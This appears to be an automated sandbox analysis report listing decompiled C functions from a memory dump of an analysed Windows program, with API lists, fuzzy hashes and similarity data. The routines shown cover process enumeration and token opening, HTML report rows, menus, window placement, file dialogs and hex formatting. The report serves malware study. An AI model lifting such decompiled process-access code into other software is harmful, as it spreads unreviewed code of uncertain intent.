                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a69
                                                                                                                0x00405a05
                                                                                                                0x00405a0e
                                                                                                                0x00405a17
                                                                                                                0x00000000
                                                                                                                0x00405a19
                                                                                                                0x00405a19
                                                                                                                0x00405a1c
                                                                                                                0x00405a1d
                                                                                                                0x00405a20
                                                                                                                0x00405a29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a29
                                                                                                                0x00405a17
                                                                                                                0x00405a03
                                                                                                                0x00000000
                                                                                                                0x00405a6b
                                                                                                                0x00405a6e
                                                                                                                0x00405a72
                                                                                                                0x00405a72
                                                                                                                0x00000000
                                                                                                                0x004059d4
                                                                                                                0x00405a81
                                                                                                                0x00405a84
                                                                                                                0x00405a8f

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                  • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                  • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                  • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                  • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                  • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                  • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                  • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                  • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                • wcschr.MSVCRT ref: 00405A0E
                                                                                                                • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 768606695-0
                                                                                                                • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                0x00407639
                                                                                                                0x00407646
                                                                                                                0x00407647
                                                                                                                0x00407654
                                                                                                                0x0040765f
                                                                                                                0x0040765f
                                                                                                                0x0040766b
                                                                                                                0x0040766d
                                                                                                                0x00407672
                                                                                                                0x00407677
                                                                                                                0x0040767d
                                                                                                                0x00407680
                                                                                                                0x00407686
                                                                                                                0x00407691
                                                                                                                0x00407697
                                                                                                                0x00407699
                                                                                                                0x00407699
                                                                                                                0x0040769c
                                                                                                                0x0040769f
                                                                                                                0x004076a3
                                                                                                                0x004076a7
                                                                                                                0x004076ab
                                                                                                                0x004076b5
                                                                                                                0x004076be
                                                                                                                0x004076c8
                                                                                                                0x004076de
                                                                                                                0x004076ee
                                                                                                                0x004076f1
                                                                                                                0x004076f4
                                                                                                                0x004076fa
                                                                                                                0x00407708
                                                                                                                0x0040770e
                                                                                                                0x00407718
                                                                                                                0x0040771d
                                                                                                                0x00407723
                                                                                                                0x00407724
                                                                                                                0x00407727
                                                                                                                0x0040772c
                                                                                                                0x0040772f
                                                                                                                0x00407734
                                                                                                                0x0040773f
                                                                                                                0x00407744
                                                                                                                0x00407745
                                                                                                                0x0040767d
                                                                                                                0x00407760

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                0x0040605e
                                                                                                                0x00406061
                                                                                                                0x00406069
                                                                                                                0x00406074
                                                                                                                0x0040607a
                                                                                                                0x0040607e
                                                                                                                0x00406082
                                                                                                                0x00406148
                                                                                                                0x0040614e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406088
                                                                                                                0x00406088
                                                                                                                0x00406093
                                                                                                                0x00406098
                                                                                                                0x0040609f
                                                                                                                0x004060ae
                                                                                                                0x004060b6
                                                                                                                0x004060be
                                                                                                                0x004060c6
                                                                                                                0x004060ca
                                                                                                                0x004060cf
                                                                                                                0x004060d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004060de
                                                                                                                0x00406129
                                                                                                                0x00406129
                                                                                                                0x0040612d
                                                                                                                0x0040612f
                                                                                                                0x00406130
                                                                                                                0x00406134
                                                                                                                0x00406137
                                                                                                                0x0040613c
                                                                                                                0x0040613c
                                                                                                                0x00000000
                                                                                                                0x0040612d
                                                                                                                0x004060e7
                                                                                                                0x004060f0
                                                                                                                0x004060f2
                                                                                                                0x004060f2
                                                                                                                0x004060f9
                                                                                                                0x004060fd
                                                                                                                0x00406102
                                                                                                                0x0040610c
                                                                                                                0x00406112
                                                                                                                0x00406117
                                                                                                                0x00406117
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406102
                                                                                                                0x00406122
                                                                                                                0x00406128
                                                                                                                0x00000000
                                                                                                                0x0040613f
                                                                                                                0x0040613f
                                                                                                                0x00406140
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                0x00402bee
                                                                                                                0x00402bf8
                                                                                                                0x00402cae
                                                                                                                0x00402c08
                                                                                                                0x00402c10
                                                                                                                0x00402c11
                                                                                                                0x00402c12
                                                                                                                0x00402c13
                                                                                                                0x00402c20
                                                                                                                0x00402c27
                                                                                                                0x00402c2e
                                                                                                                0x00402c30
                                                                                                                0x00402c37
                                                                                                                0x00402c4b
                                                                                                                0x00402c50
                                                                                                                0x00402c53
                                                                                                                0x00402c55
                                                                                                                0x00402c3e
                                                                                                                0x00402c3e
                                                                                                                0x00402c41
                                                                                                                0x00402c41
                                                                                                                0x00402c5a
                                                                                                                0x00402c60
                                                                                                                0x00402c65
                                                                                                                0x00402c68
                                                                                                                0x00402c6d
                                                                                                                0x00402c77
                                                                                                                0x00402c7c
                                                                                                                0x00402c7e
                                                                                                                0x00402c87
                                                                                                                0x00402ca5
                                                                                                                0x00402ca5
                                                                                                                0x00402c87
                                                                                                                0x00402c7c
                                                                                                                0x00402c6d
                                                                                                                0x00000000
                                                                                                                0x00402cac

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155976603-0
                                                                                                                • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                0x004036ef
                                                                                                                0x004036f6
                                                                                                                0x0040370b
                                                                                                                0x00403712
                                                                                                                0x00403717
                                                                                                                0x0040371c
                                                                                                                0x0040371f
                                                                                                                0x0040372c
                                                                                                                0x00403735
                                                                                                                0x00403738
                                                                                                                0x00403744
                                                                                                                0x00403751
                                                                                                                0x00403758
                                                                                                                0x00403760
                                                                                                                0x00403769
                                                                                                                0x0040376c
                                                                                                                0x00403778
                                                                                                                0x0040377b
                                                                                                                0x0040378b
                                                                                                                0x00403792
                                                                                                                0x00403795
                                                                                                                0x00403798
                                                                                                                0x0040379b
                                                                                                                0x004037a2
                                                                                                                0x004037a5
                                                                                                                0x004037a8
                                                                                                                0x004037af
                                                                                                                0x004037b7
                                                                                                                0x004037c3
                                                                                                                0x00000000
                                                                                                                0x004037d4
                                                                                                                0x004037dc

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004036F6
                                                                                                                • memset.MSVCRT ref: 00403712
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                  • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                • wcscpy.MSVCRT ref: 004037C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                • String ID: L$cfg
                                                                                                                • API String ID: 275899518-3734058911
                                                                                                                • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                0x00404ed0
                                                                                                                0x00404edf
                                                                                                                0x00404ef6
                                                                                                                0x00000000
                                                                                                                0x00404f00
                                                                                                                0x00404f1c
                                                                                                                0x00404f31
                                                                                                                0x00404f41
                                                                                                                0x00404f4e
                                                                                                                0x00404f5d
                                                                                                                0x00404f66
                                                                                                                0x00404f69
                                                                                                                0x00404f69
                                                                                                                0x00404f71
                                                                                                                0x00404f77
                                                                                                                0x00404f7d

                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                • wcscpy.MSVCRT ref: 00404F41
                                                                                                                • wcscat.MSVCRT ref: 00404F4E
                                                                                                                • wcscat.MSVCRT ref: 00404F5D
                                                                                                                • wcscpy.MSVCRT ref: 00404F71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                0x00404fe0
                                                                                                                0x00404fe9
                                                                                                                0x00405000
                                                                                                                0x00405005
                                                                                                                0x00405009
                                                                                                                0x0040500c
                                                                                                                0x0040500e
                                                                                                                0x00405015
                                                                                                                0x00405016
                                                                                                                0x00405021
                                                                                                                0x00405026
                                                                                                                0x00405027
                                                                                                                0x0040502c
                                                                                                                0x00405031
                                                                                                                0x00405039
                                                                                                                0x0040503f
                                                                                                                0x00405044
                                                                                                                0x00405048
                                                                                                                0x0040504e
                                                                                                                0x00405056
                                                                                                                0x0040505c
                                                                                                                0x0040504e
                                                                                                                0x00405065
                                                                                                                0x0040506a
                                                                                                                0x00405072
                                                                                                                0x00405079

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
